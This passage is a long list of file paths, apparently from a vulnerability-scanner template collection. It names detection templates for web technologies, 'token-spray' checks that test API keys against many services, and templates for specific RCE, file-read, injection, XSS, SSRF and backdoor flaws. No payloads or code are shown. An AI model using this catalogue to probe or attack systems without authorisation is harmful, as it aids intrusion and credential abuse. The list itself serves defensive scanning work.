-technologies/erxes-detect.yaml -technologies/fanruanoa-detect.yaml -technologies/fanruanoa2012-detect.yaml -technologies/fastjson-version.yaml -technologies/favicon-detection.yaml -technologies/fingerprinthub-web-fingerprints.yaml -technologies/froxlor-detect.yaml -technologies/geo-webserver.yaml -technologies/getsimple-cms-detect.yaml -technologies/gilacms-detect.yaml -technologies/gitbook-detect.yaml -technologies/gitea-detect.yaml -technologies/gnuboard-detect.yaml -technologies/google/firebase-urls.yaml -technologies/google/google-bucket-service.yaml -technologies/google/google-storage.yaml -technologies/graphiql-detect.yaml -technologies/graphql-detect.yaml -technologies/grav-cms-detect.yaml -technologies/graylog-api-browser.yaml -technologies/gunicorn-detect.yaml -technologies/hanwang-detect.yaml -technologies/harbor-detect.yaml -technologies/hashicorp-vault-detect.yaml -technologies/herokuapp-detect.yaml -technologies/hikvision-detection.yaml -technologies/home-assistant-detect.yaml -technologies/hp-blade-admin-detect.yaml -technologies/hp-media-vault-detect.yaml -technologies/ibm/ibm-http-server.yaml -technologies/ibm/ibm-sterling-detect.yaml -technologies/ilo-detect.yaml -technologies/influxdb-detect.yaml -technologies/interactsh-server.yaml -technologies/iplanet-web-server.yaml -technologies/jboss-detect.yaml -technologies/jeecg-boot-detect.yaml -technologies/jellyfin-detect.yaml -technologies/jenkins-detect.yaml -technologies/jira-serverinfo.yaml -technologies/jitsi-meet-detect.yaml -technologies/jsf-detection.yaml -technologies/kodexplorer-detect.yaml -technologies/kong-detect.yaml -technologies/kubernetes/kubernetes-enterprise-manager.yaml -technologies/kubernetes/kubernetes-mirantis.yaml -technologies/kubernetes/kubernetes-version.yaml -technologies/lexmark-detect.yaml -technologies/livehelperchat-detect.yaml -technologies/lotus-domino-version.yaml -technologies/lucee-detect.yaml -technologies/magento-detect.yaml -technologies/maian-cart-detect.yaml -technologies/metatag-cms.yaml -technologies/microsoft-iis-8.yaml -technologies/microsoft/default-iis7-page.yaml -technologies/microsoft/default-microsoft-azure-page.yaml -technologies/microsoft/default-windows-server-page.yaml -technologies/microsoft/microsoft-exchange-server-detect.yaml -technologies/microstrategy-detect.yaml -technologies/microweber-detect.yaml -technologies/moinmoin-detect.yaml -technologies/mrtg-detect.yaml -technologies/neos-detect.yaml -technologies/nextcloud-detect.yaml -technologies/nexus-detect.yaml -technologies/nginx/default-nginx-page.yaml -technologies/nginx/nginx-linux-page.yaml -technologies/nginx/nginx-version.yaml -technologies/nifi-detech.yaml -technologies/node-red-detect.yaml -technologies/oauth2-detect.yaml -technologies/octobercms-detect.yaml -technologies/oidc-detect.yaml -technologies/olivetti-crf-detect.yaml -technologies/oneblog-detect.yaml -technologies/operations-automation-default-page.yaml -technologies/oracle/default-oracle-application-page.yaml -technologies/oracle/oracle-dbass-detect.yaml -technologies/oracle/oracle-dbcs.yaml -technologies/oracle/oracle-http-server-12c.yaml -technologies/oracle/oracle-iplanet-web-server.yaml -technologies/owasp-juice-shop-detected.yaml -technologies/pega-detect.yaml -technologies/php-fusion-detect.yaml -technologies/php-proxy-detect.yaml -technologies/pi-hole-detect.yaml -technologies/piwigo-detect.yaml -technologies/plone-cms-detect.yaml -technologies/prestashop-detect.yaml -technologies/projectsend-detect.yaml -technologies/prtg-detect.yaml -technologies/puppet-node-manager-detect.yaml -technologies/redcap-detector.yaml -technologies/redmine-cli-detect.yaml -technologies/rhymix-cms-detect.yaml -technologies/rosariosis-detect.yaml -technologies/roundcube-webmail-portal.yaml -technologies/rseenet-detect.yaml -technologies/sap/sap-igs-detect.yaml -technologies/sap/sap-netweaver-detect.yaml -technologies/sap/sap-netweaver-webgui.yaml -technologies/sap/sap-web-dispatcher-admin-portal.yaml -technologies/sap/sap-web-dispatcher.yaml -technologies/sceditor-detect.yaml -technologies/shiro-detect.yaml -technologies/shopizer-detect.yaml -technologies/shopware-detect.yaml -technologies/sitecore-version.yaml -technologies/smartstore-detect.yaml -technologies/snipeit-panel.yaml -technologies/sonicwall-email-security-detect.yaml -technologies/spinnaker-detect.yaml -technologies/springboot-actuator.yaml -technologies/strapi-cms-detect.yaml -technologies/subrion-cms-detect.yaml -technologies/synology-web-station.yaml -technologies/tableau-server-detect.yaml -technologies/telerik/telerik-dialoghandler-detect.yaml -technologies/telerik/telerik-fileupload-detect.yaml -technologies/teradici-pcoip.yaml -technologies/terraform-detect.yaml -technologies/thinkcmf-detect.yaml -technologies/tileserver-gl.yaml -technologies/tor-socks-proxy.yaml -technologies/typo3-detect.yaml -technologies/vmware/vmware-detect.yaml -technologies/vmware/vmware-horizon.yaml -technologies/vmware/vmware-site-recovery-manager.yaml -technologies/vmware/vmware-vrealize-detect.yaml -technologies/waf-detect.yaml -technologies/web-ftp-detect.yaml -technologies/web-suite-detect.yaml -technologies/wondercms-detect.yaml -technologies/wordpress-detect.yaml -technologies/wso2-apimanager-detect.yaml -technologies/wuzhicms-detect.yaml -technologies/yapi-detect.yaml -technologies/ymhome-detect.yaml -technologies/zerof-webserver-detect.yaml -token-spray/api-abstractapi.yaml -token-spray/api-abuseipdb.yaml -token-spray/api-accuweather.yaml -token-spray/api-adafruit-io.yaml -token-spray/api-adoptapet.yaml -token-spray/api-alchemy.yaml -token-spray/api-alienvault.yaml -token-spray/api-aniapi.yaml -token-spray/api-apigee-edge.yaml -token-spray/api-appveyor.yaml -token-spray/api-asana.yaml -token-spray/api-bhagavadgita.yaml -token-spray/api-bible.yaml -token-spray/api-binance.yaml -token-spray/api-bingmaps.yaml -token-spray/api-bitcoinaverage.yaml -token-spray/api-bitly.yaml -token-spray/api-bitquery.yaml -token-spray/api-bitrise.yaml -token-spray/api-block.yaml -token-spray/api-blockchain.yaml -token-spray/api-blockfrost.yaml -token-spray/api-box.yaml -token-spray/api-bravenewcoin.yaml -token-spray/api-buildkite.yaml -token-spray/api-buttercms.yaml -token-spray/api-calendarific.yaml -token-spray/api-calendly.yaml -token-spray/api-charity.yaml -token-spray/api-circleci.yaml -token-spray/api-clearbit.yaml -token-spray/api-coinapi.yaml -token-spray/api-coinlayer.yaml -token-spray/api-cooperhewitt.yaml -token-spray/api-covalent.yaml -token-spray/api-dbt.yaml -token-spray/api-ddownload.yaml -token-spray/api-deviantart.yaml -token-spray/api-dribbble.yaml -token-spray/api-dropbox.yaml -token-spray/api-ebird.yaml -token-spray/api-etherscan.yaml -token-spray/api-europeana.yaml -token-spray/api-facebook.yaml -token-spray/api-festivo.yaml -token-spray/api-fontawesome.yaml -token-spray/api-fortitoken-cloud.yaml -token-spray/api-github.yaml -token-spray/api-gofile.yaml -token-spray/api-harvardart.yaml -token-spray/api-heroku.yaml -token-spray/api-holidayapi.yaml -token-spray/api-hubspot.yaml -token-spray/api-iconfinder.yaml -token-spray/api-improvmx.yaml -token-spray/api-instagram.yaml -token-spray/api-instatus.yaml -token-spray/api-intercom.yaml -token-spray/api-ipstack.yaml -token-spray/api-iterable.yaml -token-spray/api-iucn.yaml -token-spray/api-jumpcloud.yaml -token-spray/api-launchdarkly.yaml -token-spray/api-leanix.yaml -token-spray/api-linkedin.yaml -token-spray/api-lokalise.yaml -token-spray/api-loqate.yaml -token-spray/api-mailboxvalidator.yaml -token-spray/api-mailchimp.yaml -token-spray/api-mailgun.yaml -token-spray/api-malshare.yaml -token-spray/api-malwarebazaar.yaml -token-spray/api-mapbox.yaml -token-spray/api-micro-user-service.yaml -token-spray/api-mojoauth.yaml -token-spray/api-myanimelist.yaml -token-spray/api-mywot.yaml -token-spray/api-nerdgraph.yaml -token-spray/api-netlify.yaml -token-spray/api-nownodes.yaml -token-spray/api-npm.yaml -token-spray/api-onelogin.yaml -token-spray/api-openweather.yaml -token-spray/api-optimizely.yaml -token-spray/api-orbintelligence.yaml -token-spray/api-pagerduty.yaml -token-spray/api-particle.yaml -token-spray/api-pastebin.yaml -token-spray/api-paypal.yaml -token-spray/api-pendo.yaml -token-spray/api-petfinder.yaml -token-spray/api-pinata.yaml -token-spray/api-pivotaltracker.yaml -token-spray/api-postmark.yaml -token-spray/api-quip.yaml -token-spray/api-rijksmuseum.yaml -token-spray/api-scanii.yaml -token-spray/api-sendgrid.yaml -token-spray/api-slack.yaml -token-spray/api-smartsheet.yaml -token-spray/api-sonarcloud.yaml -token-spray/api-spotify.yaml -token-spray/api-square.yaml -token-spray/api-strava.yaml -token-spray/api-stripe.yaml -token-spray/api-stytch.yaml -token-spray/api-taiga.yaml -token-spray/api-thecatapi.yaml -token-spray/api-thedogapi.yaml -token-spray/api-tink.yaml -token-spray/api-tinypng.yaml -token-spray/api-travisci.yaml -token-spray/api-trello.yaml -token-spray/api-twitter.yaml -token-spray/api-urlscan.yaml -token-spray/api-vercel.yaml -token-spray/api-virustotal.yaml -token-spray/api-visualstudio.yaml -token-spray/api-wakatime.yaml -token-spray/api-web3storage.yaml -token-spray/api-webex.yaml -token-spray/api-weglot.yaml -token-spray/api-wordcloud.yaml -token-spray/api-youtube.yaml -token-spray/google-autocomplete.yaml -token-spray/google-books.yaml -token-spray/google-customsearch.yaml -token-spray/google-directions.yaml -token-spray/google-elevation.yaml -token-spray/google-fcm.yaml -token-spray/google-findplacefromtext.yaml -token-spray/google-gedistancematrix.yaml -token-spray/google-geocode.yaml -token-spray/google-geolocation.yaml -token-spray/google-mapsembed.yaml -token-spray/google-mapsembedadvanced.yaml -token-spray/google-nearbysearch.yaml -token-spray/google-nearestroads.yaml -token-spray/google-placedetails.yaml -token-spray/google-placesphoto.yaml -token-spray/google-playablelocations.yaml -token-spray/google-routetotraveled.yaml -token-spray/google-speedlimit.yaml -token-spray/google-staticmaps.yaml -token-spray/google-streetview.yaml -token-spray/google-timezone.yaml -token-spray/googlet-extsearchplaces.yaml -vulnerabilities/apache/apache-flink-unauth-rce.yaml -vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml -vulnerabilities/apache/apache-solr-file-read.yaml -vulnerabilities/apache/apache-solr-log4j-rce.yaml -vulnerabilities/cisco/cucm-username-enumeration.yaml -vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml -vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml -vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml -vulnerabilities/generic/cache-poisoning.yaml -vulnerabilities/generic/cors-misconfig.yaml -vulnerabilities/generic/error-based-sql-injection.yaml -vulnerabilities/generic/generic-blind-xxe.yaml -vulnerabilities/generic/generic-linux-lfi.yaml -vulnerabilities/generic/generic-windows-lfi.yaml -vulnerabilities/generic/host-header-injection.yaml -vulnerabilities/generic/oob-header-based-interaction.yaml -vulnerabilities/generic/oob-param-based-interaction.yaml -vulnerabilities/generic/open-redirect.yaml -vulnerabilities/generic/request-based-interaction.yaml -vulnerabilities/generic/top-xss-params.yaml -vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml -vulnerabilities/gitlab/gitlab-rce.yaml -vulnerabilities/grafana/grafana-file-read.yaml -vulnerabilities/ibm/eclipse-help-system-xss.yaml -vulnerabilities/ibm/ibm-infoprint-lfi.yaml -vulnerabilities/ibm/ibm-websphere-ssrf.yaml -vulnerabilities/jamf/jamf-blind-xxe.yaml -vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml -vulnerabilities/jenkins/jenkins-script.yaml -vulnerabilities/jenkins/jenkins-stack-trace.yaml -vulnerabilities/jenkins/unaunthenticated-jenkin.yaml -vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml -vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml -vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml -vulnerabilities/jira/jira-unauthenticated-resolutions.yaml -vulnerabilities/jira/jira-unauthenticated-screens.yaml -vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml -vulnerabilities/joomla/rusty-joomla.yaml -vulnerabilities/laravel/laravel-ignition-xss.yaml -vulnerabilities/linkerd/linkerd-ssrf.yaml -vulnerabilities/magento/magento-2-exposed-api.yaml -vulnerabilities/magento/magento-cacheleak.yaml -vulnerabilities/magento/magento-unprotected-dev-files.yaml -vulnerabilities/metersphere/metersphere-plugin-rce.yaml -vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml -vulnerabilities/moodle/moodle-filter-jmol-xss.yaml -vulnerabilities/moodle/moodle-xss.yaml -vulnerabilities/netsweeper/netsweeper-open-redirect.yaml -vulnerabilities/netsweeper/netsweeper-rxss.yaml -vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml -vulnerabilities/oracle/oracle-ebs-xss.yaml -vulnerabilities/oracle/oracle-siebel-xss.yaml -vulnerabilities/oscommerce/oscommerce-rce.yaml -vulnerabilities/other/74cms-sqli.yaml -vulnerabilities/other/accent-microcomputers-lfi.yaml -vulnerabilities/other/acme-xss.yaml -vulnerabilities/other/antsword-backdoor.yaml -vulnerabilities/other/asanhamayesh-lfi.yaml -vulnerabilities/other/aspnuke-openredirect.yaml -vulnerabilities/other/bems-api-lfi.yaml -vulnerabilities/other/beward-ipcamera-disclosure.yaml -vulnerabilities/other/bitrix-open-redirect.yaml -vulnerabilities/other/blue-ocean-excellence-lfi.yaml -vulnerabilities/other/buffalo-config-injection.yaml -vulnerabilities/other/bullwark-momentum-lfi.yaml -vulnerabilities/other/cacti-weathermap-file-write.yaml -vulnerabilities/other/caucho-resin-info-disclosure.yaml -vulnerabilities/other/chamilo-lms-sqli.yaml -vulnerabilities/other/chamilo-lms-xss.yaml -vulnerabilities/other/ckan-dom-based-xss.yaml -vulnerabilities/other/clockwatch-enterprise-rce.yaml -vulnerabilities/other/coldfusion-debug-xss.yaml -vulnerabilities/other/commax-biometric-auth-bypass.yaml -vulnerabilities/other/commax-credentials-disclosure.yaml -vulnerabilities/other/comtrend-password-exposure.yaml -vulnerabilities/other/concrete-xss.yaml -vulnerabilities/other/core-chuangtian-cloud-rce.yaml -vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml -vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml -vulnerabilities/other/dedecms-membergroup-sqli.yaml -vulnerabilities/other/dedecms-openredirect.yaml -vulnerabilities/other/dicoogle-pacs-lfi.yaml -vulnerabilities/other/dlink-850L-info-leak.yaml -vulnerabilities/other/duomicms-sql-injection.yaml -vulnerabilities/other/ecology-filedownload-directory-traversal.yaml -vulnerabilities/other/ecology-springframework-directory-traversal.yaml -vulnerabilities/other/ecshop-sqli.yaml -vulnerabilities/other/eibiz-lfi.yaml -vulnerabilities/other/empirecms-xss.yaml -vulnerabilities/other/erp-nc-directory-traversal.yaml -vulnerabilities/other/etouch-v2-sqli.yaml -vulnerabilities/other/ewebs-arbitrary-file-reading.yaml -vulnerabilities/other/eyelock-nano-lfd.yaml -vulnerabilities/other/eyou-email-rce.yaml -vulnerabilities/other/fanruanoa2012-disclosure.yaml -vulnerabilities/other/fatpipe-auth-bypass.yaml -vulnerabilities/other/fatpipe-backdoor.yaml -vulnerabilities/other/feifeicms-lfr.yaml -vulnerabilities/other/finereport-path-traversal.yaml -vulnerabilities/other/flir-path-traversal.yaml -vulnerabilities/other/geovision-geowebserver-lfi.yaml -vulnerabilities/other/geovision-geowebserver-xss.yaml -vulnerabilities/other/global-domains-lfi.yaml -vulnerabilities/other/global-domains-xss.yaml -vulnerabilities/other/gloo-unauth.yaml -vulnerabilities/other/goip-1-lfi.yaml -vulnerabilities/other/groupoffice-lfi.yaml -vulnerabilities/other/gsoap-lfi.yaml -vulnerabilities/other/h3c-imc-rce.yaml -vulnerabilities/other/hashicorp-consul-rce.yaml -vulnerabilities/other/hasura-graphql-psql-exec.yaml -vulnerabilities/other/hasura-graphql-ssrf.yaml -vulnerabilities/other/hiboss-rce.yaml -vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml -vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml -vulnerabilities/other/homeautomation-v3-openredirect.yaml -vulnerabilities/other/hrsale-unauthenticated-lfi.yaml -vulnerabilities/other/huawei-hg659-lfi.yaml -vulnerabilities/other/huawei-router-auth-bypass.yaml -vulnerabilities/other/huijietong-cloud-fileread.yaml -vulnerabilities/other/icewarp-webclient-rce.yaml -vulnerabilities/other/interlib-fileread.yaml -vulnerabilities/other/java-melody-xss.yaml -vulnerabilities/other/jeewms-lfi.yaml -vulnerabilities/other/jfrog-unauth-build-exposed.yaml -vulnerabilities/other/jinfornet-jreport-lfi.yaml -vulnerabilities/other/joomla-com-fabrik-lfi.yaml -vulnerabilities/other/kafdrop-xss.yaml -vulnerabilities/other/karel-ip-phone-lfi.yaml -vulnerabilities/other/kevinlab-bems-backdoor.yaml -vulnerabilities/other/kevinlab-bems-sqli.yaml -vulnerabilities/other/kevinlab-hems-backdoor.yaml -vulnerabilities/other/keycloak-xss.yaml -vulnerabilities/other/kyocera-m2035dn-lfi.yaml -vulnerabilities/other/landray-oa-fileread.yaml -vulnerabilities/other/lotuscms-rce.yaml -vulnerabilities/other/lucee-xss.yaml -vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml -vulnerabilities/other/maccmsv10-backdoor.yaml -vulnerabilities/other/magicflow-lfi.yaml -vulnerabilities/other/mcafee-epo-rce.yaml -vulnerabilities/other/metinfo-lfi.yaml -vulnerabilities/other/microstrategy-ssrf.yaml -vulnerabilities/other/microweber-xss.yaml -vulnerabilities/other/mida-eframework-xss.yaml -vulnerabilities/other/minimouse-lfi.yaml -vulnerabilities/other/mirai-unknown-rce.yaml -vulnerabilities/other/mpsec-lfi.yaml -vulnerabilities/other/ms-exchange-server-reflected-xss.yaml -vulnerabilities/other/myucms-lfr.yaml -vulnerabilities/other/natshell-path-traversal.yaml -vulnerabilities/other/natshell-rce.yaml -vulnerabilities/other/netgear-router-auth-bypass.yaml -vulnerabilities/other/netgear-router-exposure.yaml -vulnerabilities/other/netgear-wnap320-rce.yaml -vulnerabilities/other/netis-info-leak.yaml -vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml -vulnerabilities/other/ns-asg-file-read.yaml -vulnerabilities/other/nuuo-file-inclusion.yaml -vulnerabilities/other/nuuo-nvrmini2-rce.yaml -vulnerabilities/other/oa-tongda-path-traversal.yaml -vulnerabilities/other/oa-v9-uploads-file.yaml -vulnerabilities/other/odoo-cms-redirect.yaml -vulnerabilities/other/oliver-library-lfi.yaml -vulnerabilities/other/opensis-lfi.yaml -vulnerabilities/other/opensns-rce.yaml -vulnerabilities/other/openvpn-hhi.yaml -vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml -vulnerabilities/other/otobo-open-redirect.yaml -vulnerabilities/other/pacsone-server-lfi.yaml -vulnerabilities/other/parentlink-xss.yaml -vulnerabilities/other/php-timeclock-xss.yaml -vulnerabilities/other/php-zerodium-backdoor-rce.yaml -vulnerabilities/other/phpwiki-lfi.yaml -vulnerabilities/other/pmb-directory-traversal.yaml -vulnerabilities/other/pmb-local-file-disclosure.yaml -vulnerabilities/other/pollbot-redirect.yaml -vulnerabilities/other/powercreator-cms-rce.yaml -vulnerabilities/other/processmaker-lfi.yaml -vulnerabilities/other/qcubed-xss.yaml -vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml -vulnerabilities/other/qihang-media-disclosure.yaml -vulnerabilities/other/qihang-media-lfi.yaml -vulnerabilities/other/rce-shellshock-user-agent.yaml -vulnerabilities/other/rconfig-rce.yaml -vulnerabilities/other/resin-cnnvd-200705-315.yaml -vulnerabilities/other/resin-inputfile-fileread.yaml -vulnerabilities/other/resin-viewfile-lfr.yaml -vulnerabilities/other/rockmongo-xss.yaml -vulnerabilities/other/ruijie-eg-rce.yaml -vulnerabilities/other/ruijie-networks-lfi.yaml -vulnerabilities/other/ruijie-networks-rce.yaml -vulnerabilities/other/sangfor-edr-auth-bypass.yaml -vulnerabilities/other/sangfor-edr-rce.yaml -vulnerabilities/other/sap-redirect.yaml -vulnerabilities/other/sar2html-rce.yaml -vulnerabilities/other/seacms-rce.yaml -vulnerabilities/other/seowon-router-rce.yaml -vulnerabilities/other/servicenow-helpdesk-credential.yaml -vulnerabilities/other/showdoc-file-upload-rce.yaml -vulnerabilities/other/sick-beard-xss.yaml -vulnerabilities/other/sl-studio-lfi.yaml -vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml -vulnerabilities/other/solar-log-authbypass.yaml -vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml -vulnerabilities/other/spark-webui-unauth.yaml -vulnerabilities/other/sponip-network-system-ping-rce.yaml -vulnerabilities/other/symantec-messaging-gateway.yaml -vulnerabilities/other/tamronos-rce.yaml -vulnerabilities/other/thinkific-redirect.yaml -vulnerabilities/other/thruk-xss.yaml -vulnerabilities/other/tpshop-directory-traversal.yaml -vulnerabilities/other/turbocrm-xss.yaml -vulnerabilities/other/twig-php-ssti.yaml -vulnerabilities/other/ueditor-file-upload.yaml -vulnerabilities/other/unauth-hoteldruid-panel.yaml -vulnerabilities/other/unauth-spark-api.yaml -vulnerabilities/other/unifi-network-log4j-rce.yaml -vulnerabilities/other/vanguard-post-xss.yaml -vulnerabilities/other/viewlinc-crlf-injection.yaml -vulnerabilities/other/visual-tools-dvr-rce.yaml -vulnerabilities/other/vpms-auth-bypass.yaml -vulnerabilities/other/watchguard-credentials-disclosure.yaml -vulnerabilities/other/webui-rce.yaml -vulnerabilities/other/wems-manager-xss.yaml -vulnerabilities/other/wooyun-2015-148227.yaml -vulnerabilities/other/wooyun-path-traversal.yaml -vulnerabilities/other/wuzhicms-sqli.yaml -vulnerabilities/other/xdcms-sqli.yaml -vulnerabilities/other/xerox-efi-lfi.yaml -vulnerabilities/other/yapi-rce.yaml -vulnerabilities/other/yarn-resourcemanager-rce.yaml -vulnerabilities/other/yishaadmin-lfi.yaml -vulnerabilities/other/zcms-v3-sqli.yaml -vulnerabilities/other/zhiyuan-file-upload.yaml -vulnerabilities/other/zhiyuan-oa-info-leak.yaml -vulnerabilities/other/zhiyuan-oa-session-leak.yaml -vulnerabilities/other/zimbra-preauth-ssrf.yaml -vulnerabilities/other/zms-auth-bypass.yaml -vulnerabilities/rails/rails6-xss.yaml -vulnerabilities/ransomware/deadbolt-ransomware.yaml -vulnerabilities/rocketchat/unauth-message-read.yaml -vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml -vulnerabilities/samsung/samsung-wlan-ap-rce.yaml -vulnerabilities/samsung/samsung-wlan-ap-xss.yaml -vulnerabilities/simplecrm/simple-crm-sql-injection.yaml -vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml -vulnerabilities/springboot/springboot-h2-db-rce.yaml -vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml -vulnerabilities/squirrelmail/squirrelmail-lfi.yaml -vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml -vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml -vulnerabilities/thinkcmf/thinkcmf-lfi.yaml -vulnerabilities/thinkcmf/thinkcmf-rce.yaml -vulnerabilities/thinkphp/thinkphp-2-rce.yaml -vulnerabilities/thinkphp/thinkphp-501-rce.yaml -vulnerabilities/thinkphp/thinkphp-5022-rce.yaml -vulnerabilities/thinkphp/thinkphp-5023-rce.yaml -vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml -vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml -vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml -vulnerabilities/vmware/vmware-vcenter-lfi.yaml -vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml -vulnerabilities/vmware/vmware-vcenter-ssrf.yaml -vulnerabilities/wordpress/accessibility-helper-xss.yaml -vulnerabilities/wordpress/ad-widget-lfi.yaml -vulnerabilities/wordpress/advanced-access-manager-lfi.yaml -vulnerabilities/wordpress/alfacgiapi-wordpress.yaml -vulnerabilities/wordpress/aspose-file-download.yaml -vulnerabilities/wordpress/aspose-ie-file-download.yaml -vulnerabilities/wordpress/aspose-pdf-file-download.yaml -vulnerabilities/wordpress/aspose-words-file-download.yaml -vulnerabilities/wordpress/attitude-theme-open-redirect.yaml -vulnerabilities/wordpress/brandfolder-lfi.yaml -vulnerabilities/wordpress/brandfolder-open-redirect.yaml -vulnerabilities/wordpress/candidate-application-lfi.yaml -vulnerabilities/wordpress/cherry-file-download.yaml -vulnerabilities/wordpress/cherry-lfi.yaml -vulnerabilities/wordpress/church-admin-lfi.yaml -vulnerabilities/wordpress/churchope-lfi.yaml -vulnerabilities/wordpress/db-backup-lfi.yaml -vulnerabilities/wordpress/diarise-theme-lfi.yaml -vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml -vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml -vulnerabilities/wordpress/easy-social-feed.yaml -vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml -vulnerabilities/wordpress/elementorpage-open-redirect.yaml -vulnerabilities/wordpress/elex-woocommerce-xss.yaml -vulnerabilities/wordpress/feedwordpress-xss.yaml -vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml -vulnerabilities/wordpress/hb-audio-lfi.yaml -vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml -vulnerabilities/wordpress/issuu-panel-lfi.yaml -vulnerabilities/wordpress/mthemeunus-lfi.yaml -vulnerabilities/wordpress/music-store-open-redirect.yaml -vulnerabilities/wordpress/my-chatbot-xss.yaml -vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml -vulnerabilities/wordpress/newsletter-open-redirect.yaml -vulnerabilities/wordpress/ninjaform-open-redirect.yaml -vulnerabilities/wordpress/noptin-open-redirect.yaml -vulnerabilities/wordpress/pieregister-open-redirect.yaml -vulnerabilities/wordpress/sassy-social-share.yaml -vulnerabilities/wordpress/shortcode-lfi.yaml -vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml -vulnerabilities/wordpress/sniplets-lfi.yaml -vulnerabilities/wordpress/sniplets-xss.yaml -vulnerabilities/wordpress/ultimatemember-open-redirect.yaml -vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml -vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml -vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml -vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml -vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml -vulnerabilities/wordpress/wordpress-db-backup-listing.yaml -vulnerabilities/wordpress/wordpress-db-backup.yaml -vulnerabilities/wordpress/wordpress-db-repair.yaml -vulnerabilities/wordpress/wordpress-debug-log.yaml -vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml -vulnerabilities/wordpress/wordpress-emergency-script.yaml -vulnerabilities/wordpress/wordpress-git-config.yaml -vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml -vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml -vulnerabilities/wordpress/wordpress-installer-log.yaml -vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml -vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml -vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml -vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml -vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml -vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml -vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml -vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml -vulnerabilities/wordpress/wordpress-user-enum.yaml -vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml -vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml -vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml -vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml -vulnerabilities/wordpress/wordpress-wordfence-xss.yaml -vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml -vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml -vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml -vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml -vulnerabilities/wordpress/wp-adaptive-xss.yaml -vulnerabilities/wordpress/wp-altair-listing.yaml -vulnerabilities/wordpress/wp-ambience-xss.yaml -vulnerabilities/wordpress/wp-arforms-listing.yaml -vulnerabilities/wordpress/wp-church-admin-xss.yaml -vulnerabilities/wordpress/wp-code-snippets-xss.yaml -vulnerabilities/wordpress/wp-config-setup.yaml -vulnerabilities/wordpress/wp-custom-tables-xss.yaml -vulnerabilities/wordpress/wp-email-subscribers-listing.yaml -vulnerabilities/wordpress/wp-enabled-registration.yaml -vulnerabilities/wordpress/wp-finder-xss.yaml -vulnerabilities/wordpress/wp-flagem-xss.yaml -vulnerabilities/wordpress/wp-full-path-disclosure.yaml -vulnerabilities/wordpress/wp-grimag-open-redirect.yaml -vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml -vulnerabilities/wordpress/wp-haberadam-idor.yaml -vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml -vulnerabilities/wordpress/wp-install.yaml -vulnerabilities/wordpress/wp-iwp-client-listing.yaml -vulnerabilities/wordpress/wp-javospot-lfi.yaml -vulnerabilities/wordpress/wp-knews-xss.yaml -vulnerabilities/wordpress/wp-license-file.yaml -vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml -vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml -vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml -vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml 